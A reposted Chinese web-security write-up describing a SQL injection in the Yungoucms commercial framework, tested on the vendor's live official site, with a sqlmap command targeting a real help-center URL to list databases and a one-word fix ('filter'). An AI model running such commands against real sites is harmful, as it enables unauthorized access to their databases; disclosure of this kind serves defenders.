好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

Yungoucms商业框架sql注入及修复 - 网站安全 - 自学

这里用Yungoucms商业框架的官方前台http://www.yungoucms.cn做测试。

 

该注入点位于帮助中心的任一页面,

 

 

加',报错

 

 

请出sqlmap

 

这是一个伪静态页面,直接加*跑数据

 

python sqlmap.py -u "http://www.yungoucms.cn/help/1*" --dbs

 

修复方案:

过滤

查看更多关于Yungoucms商业框架sql注入及修复 - 网站安全 - 自学的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did15492
  阅读:74次

上一篇: 74cms人才系统存储型XSS及修复 - 网站安全 - 自学

下一篇:74cms逻辑漏洞导致sql注入及修复 - 网站安全 - 自学

相关资讯